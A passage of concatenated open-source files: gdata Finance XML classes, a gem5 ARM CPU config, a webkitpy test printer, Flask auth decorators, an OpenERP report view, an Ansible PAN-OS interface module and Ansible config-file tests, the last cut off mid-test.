return5y = 'return5y'
return1w = 'return1w'
gain = Gain
return1y = 'return1y'
class PortfolioEntry(gdata.data.GDEntry):
"""Describes an entry in a feed of Finance portfolios"""
portfolio_data = PortfolioData
class PortfolioFeed(gdata.data.GDFeed):
"""Describes a Finance portfolio feed"""
entry = [PortfolioEntry]
class PositionData(atom.core.XmlElement):
"""Data for the position"""
_qname = GF_TEMPLATE % 'positionData'
return_y_t_d = 'returnYTD'
return5y = 'return5y'
return_overall = 'returnOverall'
cost_basis = CostBasis
return3y = 'return3y'
return1y = 'return1y'
return4w = 'return4w'
shares = 'shares'
days_gain = DaysGain
gain_percentage = 'gainPercentage'
market_value = MarketValue
gain = Gain
return3m = 'return3m'
return1w = 'return1w'
class Price(atom.core.XmlElement):
"""Price of the transaction"""
_qname = GF_TEMPLATE % 'price'
money = [gdata.data.Money]
class Symbol(atom.core.XmlElement):
"""Stock symbol for the company"""
_qname = GF_TEMPLATE % 'symbol'
symbol = 'symbol'
exchange = 'exchange'
full_name = 'fullName'
class PositionEntry(gdata.data.GDEntry):
"""Describes an entry in a feed of Finance positions"""
symbol = Symbol
position_data = PositionData
class PositionFeed(gdata.data.GDFeed):
"""Describes a Finance position feed"""
entry = [PositionEntry]
class TransactionData(atom.core.XmlElement):
"""Data for the transction"""
_qname = GF_TEMPLATE % 'transactionData'
shares = 'shares'
notes = 'notes'
date = 'date'
type = 'type'
commission = Commission
price = Price
class TransactionEntry(gdata.data.GDEntry):
"""Describes an entry in a feed of Finance transactions"""
transaction_data = TransactionData
class TransactionFeed(gdata.data.GDFeed):
"""Describes a Finance transaction feed"""
entry = [TransactionEntry]
|
bcheung92/Paperproject | refs/heads/master | gem5/configs/common/O3_ARM_v7a.py | 6 | # Copyright (c) 2012 The Regents of The University of Michigan
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Ron Dreslinski
from m5.objects import *
# Simple ALU Instructions have a latency of 1
class O3_ARM_v7a_Simple_Int(FUDesc):
opList = [ OpDesc(opClass='IntAlu', opLat=1) ]
count = 2
# Complex ALU instructions have a variable latencies
class O3_ARM_v7a_Complex_Int(FUDesc):
opList = [ OpDesc(opClass='IntMult', opLat=3, pipelined=True),
OpDesc(opClass='IntDiv', opLat=12, pipelined=False),
OpDesc(opClass='IprAccess', opLat=3, pipelined=True) ]
count = 1
# Floating point and SIMD instructions
class O3_ARM_v7a_FP(FUDesc):
opList = [ OpDesc(opClass='SimdAdd', opLat=4),
OpDesc(opClass='SimdAddAcc', opLat=4),
OpDesc(opClass='SimdAlu', opLat=4),
OpDesc(opClass='SimdCmp', opLat=4),
OpDesc(opClass='SimdCvt', opLat=3),
OpDesc(opClass='SimdMisc', opLat=3),
OpDesc(opClass='SimdMult',opLat=5),
OpDesc(opClass='SimdMultAcc',opLat=5),
OpDesc(opClass='SimdShift',opLat=3),
OpDesc(opClass='SimdShiftAcc', opLat=3),
OpDesc(opClass='SimdSqrt', opLat=9),
OpDesc(opClass='SimdFloatAdd',opLat=5),
OpDesc(opClass='SimdFloatAlu',opLat=5),
OpDesc(opClass='SimdFloatCmp', opLat=3),
OpDesc(opClass='SimdFloatCvt', opLat=3),
OpDesc(opClass='SimdFloatDiv', opLat=3),
OpDesc(opClass='SimdFloatMisc', opLat=3),
OpDesc(opClass='SimdFloatMult', opLat=3),
OpDesc(opClass='SimdFloatMultAcc',opLat=1),
OpDesc(opClass='SimdFloatSqrt', opLat=9),
OpDesc(opClass='FloatAdd', opLat=5),
OpDesc(opClass='FloatCmp', opLat=5),
OpDesc(opClass='FloatCvt', opLat=5),
OpDesc(opClass='FloatDiv', opLat=9, pipelined=False),
OpDesc(opClass='FloatSqrt', opLat=33, pipelined=False),
OpDesc(opClass='FloatMult', opLat=4) ]
count = 2
# Load/Store Units
class O3_ARM_v7a_Load(FUDesc):
opList = [ OpDesc(opClass='MemRead',opLat=2) ]
count = 1
class O3_ARM_v7a_Store(FUDesc):
opList = [OpDesc(opClass='MemWrite',opLat=2) ]
count = 1
# Functional Units for this CPU
class O3_ARM_v7a_FUP(FUPool):
FUList = [O3_ARM_v7a_Simple_Int(), O3_ARM_v7a_Complex_Int(),
O3_ARM_v7a_Load(), O3_ARM_v7a_Store(), O3_ARM_v7a_FP()]
# Bi-Mode Branch Predictor
class O3_ARM_v7a_BP(BiModeBP):
globalPredictorSize = 8192
globalCtrBits = 2
choicePredictorSize = 8192
choiceCtrBits = 2
BTBEntries = 2048
BTBTagSize = 18
RASSize = 16
instShiftAmt = 2
class O3_ARM_v7a_3(DerivO3CPU):
LQEntries = 16
SQEntries = 16
LSQDepCheckShift = 0
LFSTSize = 1024
SSITSize = 1024
decodeToFetchDelay = 1
renameToFetchDelay = 1
iewToFetchDelay = 1
commitToFetchDelay = 1
renameToDecodeDelay = 1
iewToDecodeDelay = 1
commitToDecodeDelay = 1
iewToRenameDelay = 1
commitToRenameDelay = 1
commitToIEWDelay = 1
fetchWidth = 3
fetchBufferSize = 16
fetchToDecodeDelay = 3
decodeWidth = 3
decodeToRenameDelay = 2
renameWidth = 3
renameToIEWDelay = 1
issueToExecuteDelay = 1
dispatchWidth = 6
issueWidth = 8
wbWidth = 8
fuPool = O3_ARM_v7a_FUP()
iewToCommitDelay = 1
renameToROBDelay = 1
commitWidth = 8
squashWidth = 8
trapLatency = 13
backComSize = 5
forwardComSize = 5
numPhysIntRegs = 128
numPhysFloatRegs = 192
numIQEntries = 32
numROBEntries = 40
switched_out = False
branchPred = O3_ARM_v7a_BP()
# Instruction Cache
class O3_ARM_v7a_ICache(Cache):
hit_latency = 1
response_latency = 1
mshrs = 2
tgts_per_mshr = 8
size = '32kB'
assoc = 2
is_read_only = True
# Writeback clean lines as well
writeback_clean = True
# Data Cache
class O3_ARM_v7a_DCache(Cache):
hit_latency = 2
response_latency = 2
mshrs = 6
tgts_per_mshr = 8
size = '32kB'
assoc = 2
write_buffers = 16
# Consider the L2 a victim cache also for clean lines
writeback_clean = True
# TLB Cache
# Use a cache as a L2 TLB
class O3_ARM_v7aWalkCache(Cache):
hit_latency = 4
response_latency = 4
mshrs = 6
tgts_per_mshr = 8
size = '1kB'
assoc = 8
write_buffers = 16
is_read_only = True
# Writeback clean lines as well
writeback_clean = True
# L2 Cache
class O3_ARM_v7aL2(Cache):
hit_latency = 12
response_latency = 12
mshrs = 16
tgts_per_mshr = 8
size = '1MB'
assoc = 16
write_buffers = 8
prefetch_on_access = True
clusivity = 'mostly_excl'
# Simple stride prefetcher
prefetcher = StridePrefetcher(degree=8, latency = 1)
tags = RandomRepl()
|
shinate/phantomjs | refs/heads/master | src/qt/qtwebkit/Tools/Scripts/webkitpy/test/printer.py | 117 | # Copyright (C) 2012 Google, Inc.
# Copyright (C) 2010 Chris Jerdonek ([email protected])
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY APPLE INC. AND ITS CONTRIBUTORS ``AS IS'' AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL APPLE INC. OR ITS CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import logging
import StringIO
from webkitpy.common.system.systemhost import SystemHost
from webkitpy.layout_tests.views.metered_stream import MeteredStream
_log = logging.getLogger(__name__)
class Printer(object):
def __init__(self, stream, options=None):
self.stream = stream
self.meter = None
self.options = options
self.num_tests = 0
self.num_started = 0
self.num_errors = 0
self.num_failures = 0
self.running_tests = []
self.completed_tests = []
if options:
self.configure(options)
def configure(self, options):
self.options = options
if options.timing:
# --timing implies --verbose
options.verbose = max(options.verbose, 1)
log_level = logging.INFO
if options.quiet:
log_level = logging.WARNING
elif options.verbose == 2:
log_level = logging.DEBUG
self.meter = MeteredStream(self.stream, (options.verbose == 2),
number_of_columns=SystemHost().platform.terminal_width())
handler = logging.StreamHandler(self.stream)
# We constrain the level on the handler rather than on the root
# logger itself. This is probably better because the handler is
# configured and known only to this module, whereas the root logger
# is an object shared (and potentially modified) by many modules.
# Modifying the handler, then, is less intrusive and less likely to
# interfere with modifications made by other modules (e.g. in unit
# tests).
handler.name = __name__
handler.setLevel(log_level)
formatter = logging.Formatter("%(message)s")
handler.setFormatter(formatter)
logger = logging.getLogger()
logger.addHandler(handler)
logger.setLevel(logging.NOTSET)
# Filter out most webkitpy messages.
#
# Messages can be selectively re-enabled for this script by updating
# this method accordingly.
def filter_records(record):
"""Filter out autoinstall and non-third-party webkitpy messages."""
# FIXME: Figure out a way not to use strings here, for example by
# using syntax like webkitpy.test.__name__. We want to be
# sure not to import any non-Python 2.4 code, though, until
# after the version-checking code has executed.
if (record.name.startswith("webkitpy.common.system.autoinstall") or
record.name.startswith("webkitpy.test")):
return True
if record.name.startswith("webkitpy"):
return False
return True
testing_filter = logging.Filter()
testing_filter.filter = filter_records
# Display a message so developers are not mystified as to why
# logging does not work in the unit tests.
_log.info("Suppressing most webkitpy logging while running unit tests.")
handler.addFilter(testing_filter)
if self.options.pass_through:
# FIXME: Can't import at top of file, as outputcapture needs unittest2
from webkitpy.common.system import outputcapture
outputcapture.OutputCapture.stream_wrapper = _CaptureAndPassThroughStream
def write_update(self, msg):
self.meter.write_update(msg)
def print_started_test(self, source, test_name):
self.running_tests.append(test_name)
if len(self.running_tests) > 1:
suffix = ' (+%d)' % (len(self.running_tests) - 1)
else:
suffix = ''
if self.options.verbose:
write = self.meter.write_update
else:
write = self.meter.write_throttled_update
write(self._test_line(self.running_tests[0], suffix))
def print_finished_test(self, source, test_name, test_time, failures, errors):
write = self.meter.writeln
if failures:
lines = failures[0].splitlines() + ['']
suffix = ' failed:'
self.num_failures += 1
elif errors:
lines = errors[0].splitlines() + ['']
suffix = ' erred:'
self.num_errors += 1
else:
suffix = ' passed'
lines = []
if self.options.verbose:
write = self.meter.writeln
else:
write = self.meter.write_throttled_update
if self.options.timing:
suffix += ' %.4fs' % test_time
self.num_started += 1
if test_name == self.running_tests[0]:
self.completed_tests.insert(0, [test_name, suffix, lines])
else:
self.completed_tests.append([test_name, suffix, lines])
self.running_tests.remove(test_name)
for test_name, msg, lines in self.completed_tests:
if lines:
self.meter.writeln(self._test_line(test_name, msg))
for line in lines:
self.meter.writeln(' ' + line)
else:
write(self._test_line(test_name, msg))
self.completed_tests = []
def _test_line(self, test_name, suffix):
format_string = '[%d/%d] %s%s'
status_line = format_string % (self.num_started, self.num_tests, test_name, suffix)
if len(status_line) > self.meter.number_of_columns():
overflow_columns = len(status_line) - self.meter.number_of_columns()
ellipsis = '...'
if len(test_name) < overflow_columns + len(ellipsis) + 3:
# We don't have enough space even if we elide, just show the test method name.
test_name = test_name.split('.')[-1]
else:
new_length = len(test_name) - overflow_columns - len(ellipsis)
prefix = int(new_length / 2)
test_name = test_name[:prefix] + ellipsis + test_name[-(new_length - prefix):]
return format_string % (self.num_started, self.num_tests, test_name, suffix)
def print_result(self, run_time):
write = self.meter.writeln
write('Ran %d test%s in %.3fs' % (self.num_started, self.num_started != 1 and "s" or "", run_time))
if self.num_failures or self.num_errors:
write('FAILED (failures=%d, errors=%d)\n' % (self.num_failures, self.num_errors))
else:
write('\nOK\n')
class _CaptureAndPassThroughStream(object):
def __init__(self, stream):
self._buffer = StringIO.StringIO()
self._stream = stream
def write(self, msg):
self._stream.write(msg)
# Note that we don't want to capture any output generated by the debugger
# because that could cause the results of capture_output() to be invalid.
if not self._message_is_from_pdb():
self._buffer.write(msg)
def _message_is_from_pdb(self):
# We will assume that if the pdb module is in the stack then the output
# is being generated by the python debugger (or the user calling something
# from inside the debugger).
import inspect
import pdb
stack = inspect.stack()
return any(frame[1] == pdb.__file__.replace('.pyc', '.py') for frame in stack)
def flush(self):
self._stream.flush()
def getvalue(self):
return self._buffer.getvalue()
|
OpenCycleCompass/ocyco-server-python | refs/heads/develop | ocyco/api/decorators.py | 2 | from functools import wraps
from flask import request, jsonify, Response
from sqlalchemy.orm.exc import MultipleResultsFound, NoResultFound
from ocyco.models.users import Users
from ocyco.api.exceptions import MultipleMatchesException
def check_authentication(username, password, superuser=False):
"""This function is called to check if a username /
password combination is valid.
:param password: Username
:param username: Password
:param superuser: additionally check if user is superuser
"""
try:
user = Users.query.filter_by(name=username).one()
if superuser:
return user.verify_password(password) and user.is_superuser()
else:
return user.verify_password(password)
except MultipleResultsFound:
raise MultipleMatchesException('Multiple user with name \'' + username + '\' found.')
except NoResultFound:
return False
def authenticate():
"""Sends a 401 response that enables basic auth"""
return Response(
jsonify({
'status': 'Unauthorized',
'error': 'Please authenticate using HTTP Basic Auth (realm=\'OCYCO\')'
}),
401,
{'WWW-Authenticate': 'Basic realm="OCYCO"'}
)
def requires_authentication(f):
@wraps(f)
def decorated_function(*args, **kwargs):
auth = request.authorization
if not auth or not check_authentication(auth.username, auth.password):
return authenticate()
return f(*args, **kwargs)
return decorated_function
def requires_superuser(f):
@wraps(f)
def decorated_function(*args, **kwargs):
auth = request.authorization
if not auth or not check_authentication(auth.username, auth.password, True):
return authenticate()
return f(*args, **kwargs)
return decorated_function
|
darkleons/BE | refs/heads/master | addons/hr_evaluation/report/hr_evaluation_report.py | 313 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp import tools
from openerp.osv import fields, osv
class hr_evaluation_report(osv.Model):
_name = "hr.evaluation.report"
_description = "Evaluations Statistics"
_auto = False
_columns = {
'create_date': fields.datetime('Create Date', readonly=True),
'delay_date': fields.float('Delay to Start', digits=(16, 2), readonly=True),
'overpass_delay': fields.float('Overpassed Deadline', digits=(16, 2), readonly=True),
'deadline': fields.date("Deadline", readonly=True),
'request_id': fields.many2one('survey.user_input', 'Request ID', readonly=True),
'closed': fields.date("Close Date", readonly=True), # TDE FIXME master: rename into date_close
'plan_id': fields.many2one('hr_evaluation.plan', 'Plan', readonly=True),
'employee_id': fields.many2one('hr.employee', "Employee", readonly=True),
'rating': fields.selection([
('0', 'Significantly bellow expectations'),
('1', 'Did not meet expectations'),
('2', 'Meet expectations'),
('3', 'Exceeds expectations'),
('4', 'Significantly exceeds expectations'),
], "Overall Rating", readonly=True),
'nbr': fields.integer('# of Requests', readonly=True), # TDE FIXME master: rename into nbr_requests
'state': fields.selection([
('draft', 'Draft'),
('wait', 'Plan In Progress'),
('progress', 'Final Validation'),
('done', 'Done'),
('cancel', 'Cancelled'),
], 'Status', readonly=True),
}
_order = 'create_date desc'
_depends = {
'hr.evaluation.interview': ['evaluation_id', 'id', 'request_id'],
'hr_evaluation.evaluation': [
'create_date', 'date', 'date_close', 'employee_id', 'plan_id',
'rating', 'state',
],
}
def init(self, cr):
tools.drop_view_if_exists(cr, 'hr_evaluation_report')
cr.execute("""
create or replace view hr_evaluation_report as (
select
min(l.id) as id,
s.create_date as create_date,
s.employee_id,
l.request_id,
s.plan_id,
s.rating,
s.date as deadline,
s.date_close as closed,
count(l.*) as nbr,
s.state,
avg(extract('epoch' from age(s.create_date,CURRENT_DATE)))/(3600*24) as delay_date,
avg(extract('epoch' from age(s.date,CURRENT_DATE)))/(3600*24) as overpass_delay
from
hr_evaluation_interview l
LEFT JOIN
hr_evaluation_evaluation s on (s.id=l.evaluation_id)
GROUP BY
s.create_date,
s.state,
s.employee_id,
s.date,
s.date_close,
l.request_id,
s.rating,
s.plan_id
)
""")
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
cryptobanana/ansible | refs/heads/devel | lib/ansible/modules/network/panos/panos_interface.py | 13 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Ansible module to manage PaloAltoNetworks Firewall
# (c) 2016, techbizdev <[email protected]>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: panos_interface
short_description: configure data-port network interface for DHCP
description:
- Configure data-port (DP) network interface for DHCP. By default DP interfaces are static.
author: "Luigi Mori (@jtschichold), Ivan Bojer (@ivanbojer)"
version_added: "2.3"
requirements:
- pan-python can be obtained from PyPi U(https://pypi.python.org/pypi/pan-python)
notes:
- Checkmode is not supported.
options:
ip_address:
description:
- IP address (or hostname) of PAN-OS device being configured.
required: true
username:
description:
- Username credentials to use for auth.
default: "admin"
password:
description:
- Password credentials to use for auth.
required: true
if_name:
description:
- Name of the interface to configure.
required: true
zone_name:
description: >
Name of the zone for the interface. If the zone does not exist it is created but if the zone exists and
it is not of the layer3 type the operation will fail.
required: true
create_default_route:
description:
- Whether or not to add default route with router learned via DHCP.
default: "false"
commit:
description:
- Commit if changed
default: true
'''
EXAMPLES = '''
- name: enable DHCP client on ethernet1/1 in zone public
interface:
password: "admin"
ip_address: "192.168.1.1"
if_name: "ethernet1/1"
zone_name: "public"
create_default_route: "yes"
'''
RETURN = '''
# Default return values
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.basic import get_exception
try:
import pan.xapi
from pan.xapi import PanXapiError
HAS_LIB = True
except ImportError:
HAS_LIB = False
_IF_XPATH = "/config/devices/entry[@name='localhost.localdomain']" +\
"/network/interface/ethernet/entry[@name='%s']"
_ZONE_XPATH = "/config/devices/entry[@name='localhost.localdomain']" +\
"/vsys/entry/zone/entry"
_ZONE_XPATH_QUERY = _ZONE_XPATH + "[network/layer3/member/text()='%s']"
_ZONE_XPATH_IF = _ZONE_XPATH + "[@name='%s']/network/layer3/member[text()='%s']"
_VR_XPATH = "/config/devices/entry[@name='localhost.localdomain']" +\
"/network/virtual-router/entry"
def add_dhcp_if(xapi, if_name, zone_name, create_default_route):
if_xml = [
'<entry name="%s">',
'<layer3>',
'<dhcp-client>',
'<create-default-route>%s</create-default-route>',
'</dhcp-client>'
'</layer3>'
'</entry>'
]
cdr = 'yes'
if not create_default_route:
cdr = 'no'
if_xml = (''.join(if_xml)) % (if_name, cdr)
xapi.edit(xpath=_IF_XPATH % if_name, element=if_xml)
xapi.set(xpath=_ZONE_XPATH + "[@name='%s']/network/layer3" % zone_name,
element='<member>%s</member>' % if_name)
xapi.set(xpath=_VR_XPATH + "[@name='default']/interface",
element='<member>%s</member>' % if_name)
return True
def if_exists(xapi, if_name):
xpath = _IF_XPATH % if_name
xapi.get(xpath=xpath)
network = xapi.element_root.find('.//layer3')
return (network is not None)
def main():
argument_spec = dict(
ip_address=dict(required=True),
password=dict(required=True, no_log=True),
username=dict(default='admin'),
if_name=dict(required=True),
zone_name=dict(required=True),
create_default_route=dict(type='bool', default=False),
commit=dict(type='bool', default=True)
)
module = AnsibleModule(argument_spec=argument_spec, supports_check_mode=False)
if not HAS_LIB:
module.fail_json(msg='pan-python is required for this module')
ip_address = module.params["ip_address"]
password = module.params["password"]
username = module.params['username']
xapi = pan.xapi.PanXapi(
hostname=ip_address,
api_username=username,
api_password=password
)
if_name = module.params['if_name']
zone_name = module.params['zone_name']
create_default_route = module.params['create_default_route']
commit = module.params['commit']
ifexists = if_exists(xapi, if_name)
if ifexists:
module.exit_json(changed=False, msg="interface exists, not changed")
try:
changed = add_dhcp_if(xapi, if_name, zone_name, create_default_route)
except PanXapiError:
exc = get_exception()
module.fail_json(msg=exc.message)
if changed and commit:
xapi.commit(cmd="<commit></commit>", sync=True, interval=1)
module.exit_json(changed=changed, msg="okey dokey")
if __name__ == '__main__':
main()
|
ghjm/ansible | refs/heads/devel | test/units/config/manager/test_find_ini_config_file.py | 35 | # -*- coding: utf-8 -*-
# Copyright: (c) 2017, Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
import os.path
import stat
import pytest
from ansible.config.manager import find_ini_config_file
from ansible.module_utils._text import to_text
real_exists = os.path.exists
real_isdir = os.path.isdir
working_dir = os.path.dirname(__file__)
cfg_in_cwd = os.path.join(working_dir, 'ansible.cfg')
cfg_dir = os.path.join(working_dir, 'data')
cfg_file = os.path.join(cfg_dir, 'ansible.cfg')
alt_cfg_file = os.path.join(cfg_dir, 'test.cfg')
cfg_in_homedir = os.path.expanduser('~/.ansible.cfg')
@pytest.fixture
def setup_env(request):
cur_config = os.environ.get('ANSIBLE_CONFIG', None)
cfg_path = request.param[0]
if cfg_path is None and cur_config:
del os.environ['ANSIBLE_CONFIG']
else:
os.environ['ANSIBLE_CONFIG'] = request.param[0]
yield
if cur_config is None and cfg_path:
del os.environ['ANSIBLE_CONFIG']
else:
os.environ['ANSIBLE_CONFIG'] = cur_config
@pytest.fixture
def setup_existing_files(request, monkeypatch):
def _os_path_exists(path):
if to_text(path) in (request.param[0]):
return True
else:
return False
def _os_access(path, access):
if to_text(path) in (request.param[0]):
return True
else:
return False
# Enable user and system dirs so that we know cwd takes precedence
monkeypatch.setattr("os.path.exists", _os_path_exists)
monkeypatch.setattr("os.access", _os_access)
monkeypatch.setattr("os.getcwd", lambda: os.path.dirname(cfg_dir))
monkeypatch.setattr("os.path.isdir", lambda path: True if to_text(path) == cfg_dir else real_isdir(path))
class TestFindIniFile:
# This tells us to run twice, once with a file specified and once with a directory
@pytest.mark.parametrize('setup_env, expected', (([alt_cfg_file], alt_cfg_file), ([cfg_dir], cfg_file)), indirect=['setup_env'])
# This just passes the list of files that exist to the fixture
@pytest.mark.parametrize('setup_existing_files',
[[('/etc/ansible/ansible.cfg', cfg_in_homedir, cfg_in_cwd, alt_cfg_file, cfg_file)]],
indirect=['setup_existing_files'])
def test_env_has_cfg_file(self, setup_env, setup_existing_files, expected):
"""ANSIBLE_CONFIG is specified, use it"""
warnings = set()
assert find_ini_config_file(warnings) == expected
assert warnings == set()
@pytest.mark.parametrize('setup_env', ([alt_cfg_file], [cfg_dir]), indirect=['setup_env'])
@pytest.mark.parametrize('setup_existing_files',
[[('/etc/ansible/ansible.cfg', cfg_in_homedir, cfg_in_cwd)]],
indirect=['setup_existing_files'])
def test_env_has_no_cfg_file(self, setup_env, setup_existing_files):
"""ANSIBLE_CONFIG is specified but the file does not exist"""
warnings = set()
# since the cfg file specified by ANSIBLE_CONFIG doesn't exist, the one at cwd that does
# exist should be returned
assert find_ini_config_file(warnings) == cfg_in_cwd
assert warnings == set()
# ANSIBLE_CONFIG not specified
@pytest.mark.parametrize('setup_env', [[None]], indirect=['setup_env'])
# All config files are present
@pytest.mark.parametrize('setup_existing_files',
[[('/etc/ansible/ansible.cfg', cfg_in_homedir, cfg_in_cwd, cfg_file, alt_cfg_file)]],
indirect=['setup_existing_files'])
def test_ini_in_cwd(self, setup_env, setup_existing_files):
"""ANSIBLE_CONFIG not specified. Use the cwd cfg"""
warnings = set()
assert find_ini_config_file(warnings) == cfg_in_cwd
assert warnings == set()
# ANSIBLE_CONFIG not specified
@pytest.mark.parametrize('setup_env', [[None]], indirect=['setup_env'])
# No config in cwd
@pytest.mark.parametrize('setup_existing_files',
[[('/etc/ansible/ansible.cfg', cfg_in_homedir, cfg_file, alt_cfg_file)]],
indirect=['setup_existing_files'])
def test_ini_in_homedir(self, setup_env, setup_existing_files):
"""First config found is in the homedir"""
warnings = set()
assert find_ini_config_file(warnings) == cfg_in_homedir
assert warnings == set()
# ANSIBLE_CONFIG not specified
@pytest.mark.parametrize('setup_env', [[None]], indirect=['setup_env'])
# No config in cwd
@pytest.mark.parametrize('setup_existing_files', [[('/etc/ansible/ansible.cfg', cfg_file, alt_cfg_file)]], indirect=['setup_existing_files'])
def test_ini_in_systemdir(self, setup_env, setup_existing_files):
"""First config found is the system config"""
warnings = set()
assert find_ini_config_file(warnings) == '/etc/ansible/ansible.cfg'
assert warnings == set()
# ANSIBLE_CONFIG not specified
@pytest.mark.parametrize('setup_env', [[None]], indirect=['setup_env'])
# No config in cwd
@pytest.mark.parametrize('setup_existing_files',
[[('/etc/ansible/ansible.cfg', cfg_in_homedir, cfg_file, alt_cfg_file)]],
indirect=['setup_existing_files'])
def test_cwd_does_not_exist(self, setup_env, setup_existing_files, monkeypatch):
"""Smoketest current working directory doesn't exist"""
def _os_stat(path):
raise OSError('%s does not exist' % path)
monkeypatch.setattr('os.stat', _os_stat)
warnings = set()
assert find_ini_config_file(warnings) == cfg_in_homedir
assert warnings == set()
@pytest.mark.parametrize('setup_env', [[None]], indirect=['setup_env'])
# No config in cwd
@pytest.mark.parametrize('setup_existing_files', [[list()]], indirect=['setup_existing_files'])
def test_no_config(self, setup_env, setup_existing_files):
"""No config present, no config found"""
warnings = set()
assert find_ini_config_file(warnings) is None
assert warnings == set()
# ANSIBLE_CONFIG not specified
@pytest.mark.parametrize('setup_env', [[None]], indirect=['setup_env'])
# All config files are present except in cwd
@pytest.mark.parametrize('setup_existing_files',
[[('/etc/ansible/ansible.cfg', cfg_in_homedir, cfg_file, alt_cfg_file)]],
indirect=['setup_existing_files'])
def test_no_cwd_cfg_no_warning_on_writable(self, setup_env, setup_existing_files, monkeypatch):
"""If the cwd is writable but there is no config file there, move on with no warning"""
real_stat = os.stat
def _os_stat(path):
if path == working_dir:
from posix import stat_result
stat_info = list(real_stat(path))
stat_info[stat.ST_MODE] |= stat.S_IWOTH
return stat_result(stat_info)
else:
return real_stat(path)
monkeypatch.setattr('os.stat', _os_stat)
warnings = set()
assert find_ini_config_file(warnings) == cfg_in_homedir
assert len(warnings) == 0
# ANSIBLE_CONFIG not specified
@pytest.mark.parametrize('setup_env', [[None]], indirect=['setup_env'])
# All config files are present
@pytest.mark.parametrize('setup_existing_files',
[[('/etc/ansible/ansible.cfg', cfg_in_homedir, cfg_in_cwd, cfg_file, alt_cfg_file)]],
indirect=['setup_existing_files'])
def test_cwd_warning_on_writable(self, setup_env, setup_existing_files, monkeypatch):
"""If the cwd is writable, warn and skip it """
real_stat = os.stat
def _os_stat(path):
if path == working_dir:
from posix import stat_result
stat_info = list(real_stat(path))
stat_info[stat.ST_MODE] |= stat.S_IWOTH
return stat_result(stat_info)
else:
return real_stat(path)
monkeypatch.setattr('os.stat', _os_stat)
warnings = set()
assert find_ini_config_file(warnings) == cfg_in_homedir
assert len(warnings) == 1
warning = warnings.pop()
assert u'Ansible is being run in a world writable directory' in warning
assert u'ignoring it as an ansible.cfg source' in warning
# ANSIBLE_CONFIG is sepcified
@pytest.mark.parametrize('setup_env, expected', (([alt_cfg_file], alt_cfg_file), ([cfg_in_cwd], cfg_in_cwd)), indirect=['setup_env'])
# All config files are present
@pytest.mark.parametrize('setup_existing_files',
